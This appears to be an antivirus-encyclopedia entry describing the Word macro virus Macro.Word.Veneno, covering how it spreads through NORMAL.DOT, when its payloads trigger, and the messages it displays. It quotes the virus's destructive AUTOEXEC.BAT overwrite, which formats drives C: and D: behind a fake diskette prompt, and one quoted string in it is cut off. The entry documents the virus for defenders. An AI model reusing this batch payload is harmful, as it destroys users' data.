Main Menu
Home
Bookmark
Contact Us



 
Macro.Word.Venen Viruses Information

Name: Macro.Word.Venen
Category: Viruses
Description: Details
Macro.Word.Veneno

This is an encrypted Word macro-virus containing 12 macros: Veneno, Travel1, Travel2, AutoExec, AutoOpen, Trinitron, ArchivoAbrir, ArchivoSalir, InsertVeneno, ArchivoImprimir, ArchivoGuardarComo, and ArchivoImprimirPredeter.
The virus infects the global macros area (NORMAL.DOT) upon the opening of an infected document or Word startup (AutoOpen, AutoExec), and writes itself to documents that are saved with a new name(?) - the ArchivoGuardarComo macro.
The virus detects and removes macros of several other viruses.
At ??:30 sharp, the virus drops the DOS virus in the ATTRIB.COM file. On Friday and Saturday, if the system time (minutes) is less than 5 minutes past the hour, the virus inserts the string "** V Upon printing, if the system time seconds are more than 57, the virus appends the following text to the end of document:
Finalmente me gustaria agregar queall
El Centro de Computo de esta Universidad es una verdadera verguenza, no
nos merecemos este servicio.
>>> Shame on you!!! <<<


Upon infecting a document, if the system time seconds = 38, the virus displays the MessageBox:
Un amigo desesperado en busca de...
Khelia Monica Salda~a Diaz, me encantas y te sigo buscando...
+Donde te has escondido? Atte. Tu enamorado. (LoVe90/91)

Depending on the system random counter, the virus overwrites the files with the texts:
AUTOEXEC.BAT:
@echo off
PATH=C:;C:DOS;C:WINDOWS;C:ODI;
Echo.
Echo Insert a diskette in drive A:
Echo Press any key to continue...
pause > nul
Format a: /autotest > nul
if errorlevel 0 goto End
Format d: /autotest
Format c: /autotest
Echo U r FuCkEd!
Echo.
:end
Echo Ur mommy should be very happy of having such a g00d/obedient kid...
jaja..asswipe!!!

CONFIG.SYS:
SHELL=C:DOSCOMMAND.COM /F /P
SWITCHES = /n /f



Top Viruses Visited Pages:
Invader. - 231 visits
not-a-virus:RiskWare.Tool.RegPatch. - 69 visits
Worm.P2P.Harex. - 63 visits
not-a-virus:RemoteAdmin.Win32.RAdmin.2 - 55 visits
Small.58. - 55 visits
Coito.64 - 53 visits
I-Worm.Mapson. - 45 visits
Win32.Hidra - 41 visits
Win16.Klon.1177 - 40 visits
Marine.500 - 34 visits

Random Viruses Pages:
Onkogen.168
Tula.148
Trojan.Win9x.Angrif
Tourist.187
Split.25
Kitiara.28
Selectron Famil
GTM.72
Constructor.VC
SeeYou famil


 


© 2006-2008 spyware32.com - Privacy Policy